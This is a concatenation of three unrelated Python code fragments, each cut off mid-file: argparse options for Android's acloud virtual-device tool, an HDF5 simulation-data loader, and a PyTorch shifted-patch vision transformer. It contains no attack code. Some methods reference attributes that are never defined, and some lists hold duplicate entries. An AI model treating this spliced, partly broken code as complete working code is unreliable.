" kernel-branch nor kernel-build-id are specified, the kernel that's"
" bundled with the Android build would be used.")
parser.add_argument(
"--kernel-branch",
type=str,
dest="kernel_branch",
required=False,
help="Android kernel build branch name, e.g."
" kernel-common-android-4.14. This is to test a new kernel build with a"
" particular Android build (--build-id). If specified without"
" specifying kernel-build-id, the last green build in the branch will"
" be used. If neither kernel-branch nor kernel-build-id are specified,"
" the kernel that's bundled with the Android build would be used.")
parser.add_argument(
"--kernel-build-target",
type=str,
dest="kernel_build_target",
default="kernel",
help="Kernel build target, specify if different from 'kernel'")
parser.add_argument(
"--system-branch",
type=str,
dest="system_branch",
help="'cuttlefish only' Branch to consume the system image (system.img) "
"from, will default to what is defined by --branch. "
"That feature allows to (automatically) test various combinations "
"of vendor.img (CF, e.g.) and system images (GSI, e.g.). ",
required=False)
parser.add_argument(
"--system-build-id",
type=str,
dest="system_build_id",
help="'cuttlefish only' System image build id, e.g. 2145099, P2804227",
required=False)
parser.add_argument(
"--system-build-target",
type=str,
dest="system_build_target",
help="'cuttlefish only' System image build target, specify if different "
"from --build-target",
required=False)
# TODO(146314062): Remove --multi-stage-launch after infra don't use this
# args.
parser.add_argument(
"--multi-stage-launch",
dest="multi_stage_launch",
action="store_true",
required=False,
default=True,
help="Enable the multi-stage cuttlefish launch.")
parser.add_argument(
"--no-multi-stage-launch",
dest="multi_stage_launch",
action="store_false",
required=False,
default=None,
help="Disable the multi-stage cuttlefish launch.")
parser.add_argument(
"--no-pull-log",
dest="no_pull_log",
action="store_true",
required=False,
default=None,
help="Disable auto download logs when AVD booting up failed.")
# TODO(147335651): Add gpu in user config.
# TODO(147335651): Support "--gpu" without giving any value.
parser.add_argument(
"--gpu",
type=str,
const=_DEFAULT_GPU,
nargs="?",
dest="gpu",
required=False,
default=None,
help="GPU accelerator to use if any. e.g. nvidia-tesla-k80. For local "
"instances, this arg without assigning any value is to enable "
"local gpu support.")
# Hide following args for users, it is only used in infra.
parser.add_argument(
"--num-avds-per-instance",
type=int,
dest="num_avds_per_instance",
required=False,
default=1,
help=argparse.SUPPRESS)
parser.add_argument(
"--zone",
type=str,
dest="zone",
required=False,
help=argparse.SUPPRESS)
# TODO(b/118439885): Old arg formats to support transition, delete when
# transistion is done.
parser.add_argument(
"--serial_log_file",
type=str,
dest="serial_log_file",
required=False,
help=argparse.SUPPRESS)
parser.add_argument(
"--build_id",
type=str,
dest="build_id",
required=False,
help=argparse.SUPPRESS)
parser.add_argument(
"--build_target",
type=str,
dest="build_target",
required=False,
help=argparse.SUPPRESS)
parser.add_argument(
"--system_branch",
type=str,
dest="system_branch",
required=False,
help=argparse.SUPPRESS)
parser.add_argument(
"--system_build_id",
type=str,
dest="system_build_id",
required=False,
help=argparse.SUPPRESS)
parser.add_argument(
"--system_build_target",
type=str,
dest="system_build_target",
required=False,
help=argparse.SUPPRESS)
parser.add_argument(
"--kernel_build_id",
type=str,
dest="kernel_build_id",
required=False,
help=argparse.SUPPRESS)
parser.add_argument(
"--kernel_branch",
type=str,
dest="kernel_branch",
required=False,
help=argparse.SUPPRESS)
parser.add_argument(
"--kernel_build_target",
type=str,
dest="kernel_build_target",
default="kernel",
help=argparse.SUPPRESS)
def GetCreateArgParser(subparser):
"""Return the create arg parser.
Args:
subparser: argparse.ArgumentParser that is attached to main acloud cmd.
Returns:
argparse.ArgumentParser with create options defined.
"""
create_parser = subparser.add_parser(CMD_CREATE)
create_parser.required = False
create_parser.set_defaults(which=CMD_CREATE)
# Use default=None to distinguish remote instance or local. The instance
# type will be remote if the arg is not provided.
create_parser.add_argument(
"--local-instance",
type=_PositiveInteger,
const=0,
metavar="ID",
nargs="?",
dest="local_instance",
required=False,
help="Create a local AVD instance using the resources associated with "
"the ID. Choose an unused ID automatically if the value is "
"not specified (primarily for infra usage).")
create_parser.add_argument(
"--adb-port", "-p",
type=int,
default=None,
dest="adb_port",
required=False,
help="Specify port for adb forwarding.")
create_parser.add_argument(
"--avd-type",
type=str,
dest="avd_type",
default=constants.TYPE_CF,
choices=[constants.TYPE_GCE, constants.TYPE_CF, constants.TYPE_GF, constants.TYPE_CHEEPS,
constants.TYPE_FVP],
help="Android Virtual Device type (default %s)." % constants.TYPE_CF)
create_parser.add_argument(
"--flavor",
type=str,
dest="flavor",
help="The device flavor of the AVD (default %s)." % constants.FLAVOR_PHONE)
create_parser.add_argument(
"--local-image",
type=str,
dest="local_image",
nargs="?",
default="",
required=False,
help="Use the locally built image for the AVD. Look for the image "
"artifact in $ANDROID_PRODUCT_OUT if no args value is provided."
"e.g --local-image or --local-image /path/to/dir or --local-image "
"/path/to/file")
create_parser.add_argument(
"--local-system-image",
type=str,
dest="local_system_image",
nargs="?",
default="",
required=False,
help="Use the locally built system images for the AVD. Look for the "
"images in $ANDROID_PRODUCT_OUT if no args value is provided. "
"e.g., --local-system-image or --local-system-image /path/to/dir")
create_parser.add_argument(
"--local-tool",
type=str,
dest="local_tool",
action="append",
default=[],
required=False,
help="Use the tools in the specified directory to create local "
"instances. The directory structure follows $ANDROID_HOST_OUT or "
"$ANDROID_EMULATOR_PREBUILTS.")
create_parser.add_argument(
"--image-download-dir",
type=str,
dest="image_download_dir",
required=False,
help="Define remote image download directory, e.g. /usr/local/dl.")
create_parser.add_argument(
"--yes", "-y",
action="store_true",
dest="no_prompt",
required=False,
help=("Automatic yes to prompts. Assume 'yes' as answer to all prompts "
"and run non-interactively."))
create_parser.add_argument(
"--reuse-gce",
type=str,
const=constants.SELECT_ONE_GCE_INSTANCE,
nargs="?",
dest="reuse_gce",
required=False,
help="'cuttlefish only' This can help users use their own instance. "
"Reusing specific gce instance if --reuse-gce [instance_name] is "
"provided. Select one gce instance to reuse if --reuse-gce is "
"provided.")
create_parser.add_argument(
"--host",
type=str,
dest="remote_host",
default=None,
help="'cuttlefish only' Provide host name to clean up the remote host. "
"For example: '--host 1.1.1.1'")
create_parser.add_argument(
"--host-user",
type=str,
dest="host_user",
default=constants.GCE_USER,
help="'remote host only' Provide host user for logging in to the host. "
"The default value is vsoc-01. For example: '--host 1.1.1.1 --host-user "
"vsoc-02'")
create_parser.add_argument(
"--host-ssh-private-key-path",
type=str,
dest="host_ssh_private_key_path",
default=None,
help="'remote host only' Provide host key for login on on this host.")
# User should not specify --spec and --hw_property at the same time.
hw_spec_group = create_parser.add_mutually_exclusive_group()
hw_spec_group.add_argument(
"--hw-property",
type=str,
dest="hw_property",
required=False,
help="Supported HW properties and example values: %s" %
constants.HW_PROPERTIES_CMD_EXAMPLE)
hw_spec_group.add_argument(
"--spec",
type=str,
dest="spec",
required=False,
choices=constants.SPEC_NAMES,
help="The name of a pre-configured device spec that we are "
"going to use.")
# Arguments for goldfish type.
# TODO(b/118439885): Verify args that are used in wrong avd_type.
# e.g. $acloud create --avd-type cuttlefish --emulator-build-id
create_parser.add_argument(
"--emulator-build-id",
type=int,
dest="emulator_build_id",
required=False,
help="'goldfish only' Emulator build used to run the images. "
"e.g. 4669466.")
# Arguments for cheeps type.
create_parser.add_argument(
"--stable-cheeps-host-image-name",
type=str,
dest="stable_cheeps_host_image_name",
required=False,
default=None,
| |
"""
description
"""
from __future__ import division
# from sys import path
# path.append('modules/')
# import os.path
# import click
# import h5py
# from argparse import ArgumentParser
# from math import pi, log10
# import sys
from scidata.utils import locate
import scidata.carpet.hdf5 as h5
# from scidata.carpet.interp import Interpolator
# from _curses import raw
# from mpl_toolkits.axes_grid1 import make_axes_locatable
# from matplotlib import ticker
# import matplotlib.pyplot as plt
# from matplotlib import rc
# plt.rc('text', usetex=True)
# plt.rc('font', family='serif')
# import scivis.units as ut # for tmerg
# import statsmodels.formula.api as smf
# import scipy.optimize as opt
# from math import pi, sqrt
# import matplotlib as mpl
# import pandas as pd
import numpy as np
# from glob import glob
# import itertools
# import os.path
# import cPickle
# import click
# import time
# import copy
# import h5py
# import csv
# import os
#
# import time
# import scidata.xgraph as xg
# from scipy import interpolate
# cmap = plt.get_cmap("viridis")
# from sklearn.linear_model import LinearRegression-
# from scipy.optimize import fmin
# from matplotlib.ticker import AutoMinorLocator, FixedLocator, NullFormatter, \
# MultipleLocator
# from matplotlib.colors import LogNorm, Normalize
# from utils import *
from uutils import Tools, Printcolor
from module_preanalysis.it_time import LOAD_ITTIME
# from plotting_methods import PLOT_MANY_TASKS
class LOAD_STORE_DATASETS(LOAD_ITTIME):
"""
Allows easy access to a scidata datasets of 2d data of a given simulation,
loading them only if they are needed, and storing them for future accesses.
Assumes that the simulation data is stired in /output-xxxx/data/ folders, where
'xxxx' stands for the number.
To know, which iterations are stored in what output-xxxx it first loads an ascii
file <'file_for_it'> which should be present in all output-xxxx and have a
structure with columns: 1:it 2:time (other columns do not matter)
The 2d datasets, located in output-xxxx, expected to be named like:
'rho.xy.h5'. The list of possible variables, (like 'rho') is set in
<'self.list_v_ns'>. The list of possible planes (like 'xy') in set in
<'self.list_planes'>.
Logic:
Every time when the dataset is requested via <'get_dataset(it, plane, v_n)'>,
the class do:
1. Checks what output-xxxx contains iteration 'it'
2. Checks if the dataset for this output, plane and variable name 'v_n'
has already been loaded and is present in the storage
<'self.dataset_matrix[]'>
If so: it will return the dataset from the storage.
If not: it will load the required dataset and add it to the storage
for future uses.
"""
list_neut_v_ns = ["Q_eff_nua", "Q_eff_nue", "Q_eff_nux", "R_eff_nua", "R_eff_nue", "R_eff_nux",
"optd_0_nua", "optd_0_nux", "optd_0_nue", "optd_1_nua", "optd_1_nux", "optd_1_nue"]
def __init__(self, sim, indir, pprdir):
LOAD_ITTIME.__init__(self, sim, pprdir=pprdir)
self.sim = sim
self.nlevels = 7
self.gen_set = {'nlevels':7,
'sim': sim,
'file_for_it': 'H.norm2.asc',
'iterations':0,
'indir': indir,
'outdir': pprdir + '/res_2d/'
}
# self.output_it_map = {}
self.list_outputs = self.get_list_outputs()
_, self.iterations, self.times = \
self.get_ittime(output="overall", d1d2d3prof="d2")
# print(self.iterations[0], self.iterations[-1]); exit(1)
# self.output_it_map, self.it_time = \
# set_it_output_map(Paths.gw170817+self.sim+'/')
# self.iterations = np.array(self.it_time[:, 0], dtype=int)
# self.times = np.array(self.it_time[:, 1], dtype=float)
self.list_v_ns = ['rho', 'Y_e', 'temperature', 's_phi', 'entropy', 'dens_unbnd'] + self.list_neut_v_ns
self.list_planes=['xy', 'xz', 'xy']
self.set_use_new_output_if_duplicated = False
self.dataset_matrix = [[[0
for z in range(len(self.list_v_ns))]
for k in range(len(self.list_planes))]
for s in range(len(self.list_outputs))]
# def set_it_output_map(self):
# """
# Loads set of files that have '1:it 2:time ...' structure to get a map
# of what output-xxxx contains what iteration (and time)
# """
# print('-' * 25 + 'LOADING it list ({})'
# .format(self.gen_set['file_for_it']) + '-' * 25)
# print("\t loading from: {}".format(self.gen_set['indir']))
# files = locate(self.gen_set['file_for_it'], root=self.gen_set["indir"], followlinks=True)
# # remove folders like 'collated'
# selected = []
# for file in files:
# if file.__contains__('output-'):
# selected.append(file)
# # for overall count of number of iterations and files
# it_time = np.zeros(2)
# for file in selected:
# o_name = file.split('/')
# o_dir = ''
# for o_part in o_name:
# if o_part.__contains__('output-'):
# o_dir = o_part
# if o_dir == '':
# raise NameError("Did not find output-xxxx in {}".format(o_name))
# it_time_i = np.loadtxt(file, usecols=(0,1))
# self.output_it_map[o_dir] = it_time_i
# it_time = np.vstack((it_time, it_time_i))
# it_time = np.delete(it_time, 0, 0)
# print('outputs:{} iterations:{} [{}->{}]'.format(len(selected),
# len(it_time[:,0]),
# int(it_time[:,0].min()),
# int(it_time[:,0].max())))
# print('-' * 30 + '------DONE-----' + '-' * 30)
#
# self.output_it_map, it_time = set_it_output_map(Paths.gw170817+self.sim+'/')
#
# return it_time
def check_v_n(self, v_n):
if v_n not in self.list_v_ns:
raise NameError("v_n:{} not in the v_n list (in the class)\n{}".format(v_n, self.list_v_ns))
def check_plane(self, plane):
if plane not in self.list_planes:
raise NameError("plane:{} not in the plane_list (in the class)\n{}".format(plane, self.list_planes))
def i_v_n(self, v_n):
self.check_v_n(v_n)
return int(self.list_v_ns.index(v_n))
#
def i_plane(self, plane):
self.check_plane(plane)
return int(self.list_planes.index(plane))
def load_dataset(self, o_dir, plane, v_n):
fname = v_n + '.' + plane + '.h5'
files = locate(fname, root=self.gen_set['indir'] + o_dir +'/', followlinks=False)
print("\t Loading: {} plane:{} v_n:{} dataset ({} files)"
.format(o_dir, plane, v_n, len(files)))
if len(files) > 1:
raise ValueError("More than 1 file ({}) found. \nFile:{} location:{}"
"\nFiles: {}"
.format(len(files), fname, self.gen_set['indir'] + o_dir +'/', files))
if len(files) == 0:
raise IOError("NO fils found for {}. \nlocation:{}"
.format(fname, self.gen_set['indir'] + o_dir +'/'))
dset = h5.dataset(files)
# grid = dset.get_grid(iteration=it)
# print("grid.origin: {}".format(grid.origin))
# print("grid.dim : {}".format(grid.dim))
# print("grid.coordinates(): {}".format([ [np.array(coord).min(), np.array(coord).max()] for coord in grid.coordinates()]))
# print("grid.levels: {}".format([level for level in grid.levels]))
# print("grid.extent: {}".format(grid.extent))
# exit(1)
# print("\t loading it:{} plane:{} v_n:{} dset:{}"
# .format(o_dir, plane, v_n, dset))
dset.get_grid().mesh()
# dset.get_grid_data()
self.dataset_matrix[self.i_output(o_dir)][self.i_plane(plane)][self.i_v_n(v_n)] = dset
def i_output(self, o_dir):
if o_dir not in self.list_outputs:
raise NameError("plane:{} not in the plane_list (in the class)\n{}"
.format(o_dir, self.list_outputs))
return int(self.list_outputs.index(o_dir))
def is_dataset_loaded(self, o_dir, plane, v_n):
if isinstance(self.dataset_matrix[self.i_output(o_dir)][self.i_plane(plane)][self.i_v_n(v_n)], int):
self.load_dataset(o_dir, plane, v_n)
# def it_to_output_dir(self, it):
# req_output_data_dir = []
# for output_data_dir in self.list_outputs:
# if int(it) in np.array(self.output_it_map[output_data_dir], dtype=int)[:, 0]:
# req_output_data_dir.append(output_data_dir)
#
# if len(req_output_data_dir) > 1:
# if self.set_use_new_output_if_duplicated:
# print("Warning: it:{} is found in multiple outputs:{}"
# .format(it, req_output_data_dir))
# return req_output_data_dir[0]
#
# raise ValueError("it:{} is found in multiple outputs:{}\n"
# "to overwrite, set 'set_use_new_output_if_duplicated=True' "
# .format(it, req_output_data_dir))
# elif len(req_output_data_dir) == 0:
# raise ValueError("it:{} not found in a output_it_map:\n{}\n"
# .format(it, self.output_it_map.keys()))
# else:
# return req_output_data_dir[0]
def get_dataset(self, it, plane, v_n):
# o_dir = self.it_to_output_dir(it)
output = self.get_output_for_it(it)
self.is_dataset_loaded(output, plane, v_n)
dset = self.dataset_matrix[self.i_output(output)][self.i_plane(plane)][self.i_v_n(v_n)]
if not it in dset.iterations:
it__ = int(dset.iterations[Tools.find_nearest_index(np.array(dset.iterations), it)])
raise ValueError("Iteration it:{} (located in {}) \n"
"not in the dataset list. Closest:{} Full list:\n{}"
.format(it, output, it__, dset.iterations))
return dset
def del_dataset(self, it, plane, v_n):
# o_dir = self.it_to_output_dir(it)
output = self.get_output_for_it(it)
self.dataset_matrix[self.i_output(output)][self.i_plane(plane)][self.i_v_n(v_n)] = 0
# def get_time(self, it):
#
# time = self.it_time[np.where(self.it_time[:,0] == it), 1]
# time = [item for sublist in time for item in sublist]
# print(time)
# if len(time) == 2:
# Printcolor.yellow("for it:{} more than one timestep found {}"
# .format(it, time))
# if time[0] == time[1]:
# return float(time[0]) * time_constant / 1000
# else:
# raise ValueError("for it:{} more than one timestep found {}"
# .format(it, time))
# if len(time) == 0:
# raise ValueError("for it:{} no timesteps found"
# .format(it))
# return float(time[0]) * time_constant / 1000
def load_all(self, plane, v_n):
print('-' * 25 + 'LOADING ALL DATASETS ({})'
.format(self.gen_set['file_for_it']) + '-' * 25)
Printcolor.yellow("Warning: loading all {} datasets "
"is a slow process".format(len(self.list_outputs)))
for o_dir in self.list_outputs:
try:
self.is_dataset_loaded(o_dir, plane, v_n)
except ValueError:
Printcolor.red("Failed to load o_dir:{} plane:{} v_n:{}"
.format(o_dir, plane, v_n))
self.set_all_it_times_from_outputs(plane, v_n)
print('-' * 30 + '------DONE-----' + '-' * 30)
def get_all_iterations_times(self, plane, v_n):
iterations = []
times = []
for output in self.list_outputs:
if isinstance(self.dataset_matrix[self.i_output(output)][self.i_plane(plane)][self.i_v_n(v_n)], int):
raise ValueError("Not all datasets are loaded. Missing: {}".format(output))
dset = self.dataset_matrix[self.i_output(output)][self.i_plane(plane)][self.i_v_n(v_n)]
# iterations.append(dset.iterations)
for it in dset.iterations:
iterations.append(it)
time = dset.get_time(it) * 0.004925794970773136 / 1000
times.append(time)
# print("it:{}, time:{}".format(it, time))
assert len(list(set(iterations))) == len(list(set(times)))
iterations = np.sort(list(set(iterations)))
times = np.sort(list(set(times)))
return iterations, times
def set_all_it_times_from_outputs(self, plane, v_n):
self.iterations, self.times = self.get_all_iterations_times(plane, v_n)
print('\tIterations [{}->{}] and times [{:.3f}->{:.3f}] have been reset.'
.format(self.iterations[0], self.iterations[-1],
self.times[0], self.times[-1]))
# return list(set([item for sublist in iterations for item in sublist])), \
# list(set([item for sublist in iterations for item in sublist]))
# def get_all_timesteps(self, plane, v_n):
#
# iterations = self.get_all_iterations(plane, v_n)
# times = []
# for iteration in iterations:
# times.append(self.get_time(iteration))
# return times
class EXTRACT_STORE_DATA(LOAD_STORE_DATASETS):
"""
blablabla
"""
def __init__(self, sim, | |
> 0. else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.num_variants = num_variants
self.embedding_dim = dim
self.mlp_hidden_dim = mlp_hidden_dim
for i in range(depth):
self.layers.append(nn.ModuleList([
Attention(num_variants, dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=proj_drop) if not i == 0
else Attention_variants(num_variants, dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=proj_drop),
Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=proj_drop)
]))
trunc_normal_(self.pos_emb, std=.02)
def forward(self, patches):
num_variants, B, num_patches, embedding_dim = patches.shape
assert num_variants == self.num_variants
assert embedding_dim == self.embedding_dim
patches = patches.transpose(0, 1) # 128, 44, 64, 16, 192
pos_emb = self.pos_emb.unsqueeze(dim=0)
patches = patches + pos_emb
patches = patches.transpose(0, 1)
x = patches[0]
num_layer = 0
for attn, mlp in self.layers:
if num_layer == 0:
x = x + self.drop_path(attn(self.norm1(x), self.norm1(patches), num_layer=num_layer))
else:
x = x + self.drop_path(attn(self.norm1(x), num_layer=num_layer))
x = x + self.drop_path(mlp(self.norm2(x)))
num_layer += 1
#x = x.unsqueeze(dim=0)
#patches = torch.cat((x, patches[1:]))
return x
def flops(self):
flops = 0
print("transfomer flops")
for attn, mlp in self.layers:
flops += attn.flops(self.num_patches)
flops += self.num_patches * self.dim
flops += 2* self.num_patches * self.dim * self.mlp_hidden_dim
flops += self.num_patches * self.dim
return flops
class Transformer(nn.Module):
def __init__(self, num_variants, num_patches, depth, dim, num_heads, mlp_ratio=4., qkv_bias=False, qk_scale=None, proj_drop=0., attn_drop=0.,
drop_path=0., act_layer=nn.GELU, norm_layer=partial(nn.LayerNorm, eps=1e-6)):
super().__init__()
self.norm1 = norm_layer(dim)
self.num_patches = num_patches
self.dim = dim
self.layers = nn.ModuleList([])
self.pos_emb = nn.Parameter(torch.zeros(num_patches, dim))
self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.num_variants = num_variants
self.embedding_dim = dim
self.mlp_hidden_dim = mlp_hidden_dim
for _ in range(depth):
self.layers.append(nn.ModuleList([
Attention(num_variants, dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=proj_drop),
Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=proj_drop)
]))
trunc_normal_(self.pos_emb, std=.02)
def forward(self, x):
B, num_patches, embedding_dim = x.shape
# assert num_blocks == self.num_blocks
assert embedding_dim == self.embedding_dim
pos_emb = self.pos_emb.unsqueeze(dim=0)
x = x + pos_emb
num_layer = 0
for attn, mlp in self.layers:
x = x + self.drop_path(attn(self.norm1(x), num_layer=num_layer))
x = x + self.drop_path(mlp(self.norm2(x)))
num_layer +=1
return x
def flops(self):
flops = 0
print("transfomer flops")
for attn, mlp in self.layers:
# attn
print("num patches: ", self.num_patches)
flops += attn.flops(self.num_patches)
print("attention flops: ", flops/ 1e9)
# norm
flops += self.num_patches * self.dim
print("norm flops: ", flops/ 1e9)
# mlp
flops += 2* self.num_patches * self.dim * self.mlp_hidden_dim
print("mlp flops: ", flops/ 1e9)
# norm
flops += self.num_patches * self.dim
print("norm flops: ", flops/ 1e9)
return flops
class PatchEmbed(nn.Module):
""" 2D Image to Patch Embedding
"""
def __init__(self, img_size=224, patch_size=16, stride_size=1, padding_size=1, in_chans=3, embed_dim=768, norm_layer=None):
super().__init__()
img_size = (img_size,img_size)
patch_size = (patch_size,patch_size)
self.img_size = img_size
self.patch_size = patch_size
self.grid_size = (img_size[0] // patch_size[0], img_size[1] // patch_size[1])
self.num_patches = self.grid_size[0] * self.grid_size[1]
self.patch_size = patch_size
self.embed_dim = embed_dim
# original x patches
# self.proj1 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj2 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj3 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj4 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj5 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj6 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj7 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj8 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj9 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj10 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj11 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj12 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj13 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj14 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj15 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj16 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj17 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
# self.proj18 = nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
self.projections = nn.ModuleList([])
for _ in range(NUM_VARIANTS):
self.projections.append(
nn.Conv2d(in_chans, embed_dim, kernel_size=patch_size, stride=stride_size, padding=padding_size)
)
self.norm = norm_layer(embed_dim) if norm_layer else nn.Identity()
def forward(self, img):
B, C, H, W = img.shape
assert H == self.img_size[0] and W == self.img_size[1], \
f"Input image size ({H}*{W}) doesn't match model ({self.img_size[0]}*{self.img_size[1]})."
patches = []
img_new = img
new_patch = self.norm(self.projections[0](img_new))
new_patch = new_patch.flatten(2).transpose(1, 2)
patches.append(new_patch)
paddings = [(1,0), (0,1), (-1,0), (0,-1), (2,0), (0,2), (-2,0), (0,-2),
(1,1), (1,2), (1, -1), (-1,1), (-1,2), (-1,-1), (2,1),
(2,2), (2,-1)]
for i in range(len(paddings)):
cur_padding = paddings[i]
img_new = torch.roll(img, shifts=cur_padding, dims=(2, 3))
new_patch = self.norm(self.projections[i+1](img_new))
new_patch = new_patch.flatten(2).transpose(1, 2)
patches.append(new_patch)
patches = torch.stack(patches)
return patches
def flops(self):
Ho, Wo = self.grid_size
for i in range(10):
flops = Ho * Wo * self.embed_dim * self.in_chans * (self.patch_size[0] * self.patch_size[1])
flops += Ho * Wo * self.embed_dim
return flops
class ShiftingTransformer(nn.Module):
def __init__(self,*, scaling_factor, output_dir, num_variants, image_size,patch_size,num_classes,embedding_dim,heads,num_hierarchies,num_layers_per_block, mlp_mult = 4,channels = 3, dim_head = 64, qkv_bias=True,attn_drop=0.0,
proj_drop=0.0,stochastic_depth_drop = 0.1 , init_patch_embed_size =1, kernel_size=3, stride_size=1, padding_size=1):
super().__init__()
assert (image_size % patch_size) == 0, 'Image dimensions must be divisible by the patch size.'
fmap_size = image_size // patch_size
len_pyramid = len(num_layers_per_block)
input_size_after_patch = image_size // init_patch_embed_size
initial_num_blocks = fmap_size * fmap_size
assert input_size_after_patch % patch_size == 0
down_sample_ratio = input_size_after_patch // patch_size
# assert len_pyramid == int(torch.log( torch.tensor([down_sample_ratio]).to(torch.float32))
# / torch.log(torch.tensor([2]).to(torch.float32)) + 1)
self.patch_size = patch_size
self.kernel_size = kernel_size
self.stride_size = stride_size
self.padding_size= padding_size
self.num_hierarchies = num_hierarchies
hierarchies = list(reversed(range(num_hierarchies)))
layer_heads = heads
# layer_dims = list(map(lambda t: t * dim, mults))
layer_dims = embedding_dim
self.start_embedding = embedding_dim[0][0]
self.end_embedding = embedding_dim[-1][-1]
# dim_pairs = zip(layer_dims[:-1], layer_dims[1:])
num_blocks = (initial_num_blocks, initial_num_blocks, initial_num_blocks , initial_num_blocks)
if num_hierarchies == 4:
seq_len = (initial_num_blocks, initial_num_blocks//(scaling_factor), initial_num_blocks//(scaling_factor**2), initial_num_blocks//(scaling_factor**3))
elif num_hierarchies == 3:
seq_len = (initial_num_blocks, initial_num_blocks//(scaling_factor), initial_num_blocks//(scaling_factor**2))
self.end_num_patches = seq_len[-1]
self.to_patch_embedding = PatchEmbed(img_size=image_size, patch_size=self.kernel_size, stride_size=self.stride_size, padding_size=padding_size, in_chans=3,
embed_dim=self.start_embedding)
block_repeats = cast_tuple(num_layers_per_block, num_hierarchies)
layer_heads = cast_tuple(layer_heads, num_hierarchies)
num_blocks = cast_tuple(num_blocks, num_hierarchies)
seq_lens = cast_tuple(seq_len, num_hierarchies)
dim_pairs = cast_tuple(layer_dims,num_hierarchies)
self.layers = nn.ModuleList([])
# print("build pyramid: ")
# print("levels:", hierarchies, "heds: ", layer_heads, "dim paors: ", dim_pairs, "block repeats: ", block_repeats, "num blocks: ", num_blocks)
for level, heads, (dim_in, dim_out), block_repeat, seq_len in zip(hierarchies, layer_heads, dim_pairs, block_repeats,seq_lens):
print("level: ", level, "heads: ", heads, "dim in dim out: ", (dim_in, dim_out),
"block repeat: ", block_repeat,"seq len: ", seq_len)
with open(output_dir + "/pyramid_parameters.txt", "a+") as text_file:
text_file.write(" level: ")
text_file.write(str(level))
text_file.write(" heads: ")
text_file.write(str(heads))
text_file.write(" dim in: ")
text_file.write(str(dim_in))
text_file.write(" dim out: ")
text_file.write(str(dim_out))
text_file.write(" block repeat: ")
text_file.write(str(block_repeat))
text_file.write(" seq len: ")
text_file.write(str(seq_len))
text_file.write("\n")
is_last = level == 0
depth = block_repeat
is_first = level == (num_hierarchies-1)
print("is first: ", is_first, "is last: ", is_last)
self.layers.append(nn.ModuleList([
Transformer(num_variants, seq_len, depth, dim_in, heads, mlp_mult, qkv_bias=qkv_bias, attn_drop=attn_drop,
drop_path=stochastic_depth_drop, proj_drop=proj_drop) if not is_first else
Transformer_first(num_variants, seq_len, depth, dim_in, heads, mlp_mult, qkv_bias=qkv_bias, attn_drop=attn_drop,
drop_path=stochastic_depth_drop, proj_drop=proj_drop),
Reduce_image_size(dim_in, dim_out, seq_len) if not is_last else nn.Identity()
]))
self.norm = partial(nn.LayerNorm, eps=1e-6)(self.end_embedding)
self.mlp_head = nn.Linear(self.end_embedding, num_classes)
self.apply(_init_vit_weights)
text_file.close()
def forward(self, img):
# input shape: 128, 3, 32 , 32
# print("input size: ", img.shape)
patches = self.to_patch_embedding(img) # 44, 128, 256,192
# print("x after embedding: ", patches.shape)
num_hierarchies = len(self.layers)
for level, (transformer, reduce_image_size) in zip(reversed(range(num_hierarchies)), self.layers):
patches = transformer(patches)
if level > 0:
grid_size = (int(patches.shape[1]**0.5), int(patches.shape[1]**0.5))
patches = to_image_plane(patches, grid_size, self.patch_size)
patches = reduce_image_size(patches)
patches = to_patches_plane(patches, self.patch_size)
patches = self.norm(patches)
patches_pool = torch.mean(patches, dim=(1))
return self.mlp_head(patches_pool)
def flops(self):
flops = 0
flops += self.to_patch_embedding.flops()
print(flops/ 1e9)
for level, (transformer, reduce_image_size) in zip(reversed(range(len(self.layers))), self.layers):
flops += transformer.flops()
print(flops/ 1e9)
if level > 0:
flops += reduce_image_size.flops()
print(flops/ 1e9)
# last norm
flops += self.end_embedding * self.end_num_patches
print(flops/ 1e9)
# MLP
flops += self.end_embedding * self.num_classes
print(flops/ 1e9)
return flops
def to_patches_plane(x, patch_size):
patch_size = (patch_size, patch_size)
batch, depth, height, width = x.shape # ([128, 192, 8, 8])
x = x.reshape( batch, depth, height*width) # 128, 192, 64
x = x.permute(0,2,1) # 128, 64, 192
return x
def to_image_plane(x, grid_size, patch_size):
